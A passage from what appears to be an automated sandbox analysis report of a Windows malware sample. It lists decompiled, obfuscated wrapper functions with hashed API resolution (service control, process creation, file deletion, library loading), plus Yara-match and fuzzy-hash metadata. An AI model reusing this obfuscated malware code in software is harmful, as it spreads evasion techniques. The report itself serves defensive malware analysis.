                                          
                                          				E0021602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E001D602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 2def957fbdd76c8f6afaa0a2bd22bc4160f696d70807745a4914eae7dc807cb6
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: A6018072A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E001D602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 4a01790a23612c8bc0685b17fe082e26f4db6c5654d638d0cee67d8c555ea358
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: D31133B290122DBBCB25DF95DC498DFBFB8EF14714F108188F90962210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E001D602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E001D4859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E001E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 001D48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 4d233150a7b1b8d0ca9ed02e51ebcc8e11366db29454cee23ee02343d5930ca8
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: A0F017B0E05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E001D602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 001E4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E001E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E001D602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E001E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(001D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001D591A), ref: 001E9816
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: c55db46f124b2cc675f9668ff90ed3c07b71415c0d78f6d611415f865274e5c6
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 0C11B372901188BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728AA0EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E001D602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(001E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001E0668,?,?,?,?), ref: 001DB5FD
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E001D602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E001E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E001D602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E001E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001E7C67
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: e7037390f7e7bacdf7c2bd971d6ce7ccbf9953c3af2e8e0c38516eaa01a5caa6
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 28014BB190120CFFEB09DFA4C84A8DEBBB9EF54314F208199F405A7240EBB15F509B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E001DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E001D602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E001E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001DF6D8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 25db9c83cd685e5ff74837f7b26bcfb941d860824d8c17e223a5a90ae44bee76
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 7F01E5B6901208BFEF059F94DC468DF7F75EB19324F148188F90462250D7B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E001DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E001D602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E001E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001DB759
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 4e94c54c4c2e972598a0f63784df660732168030f90fb273d613f908c69640ee
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
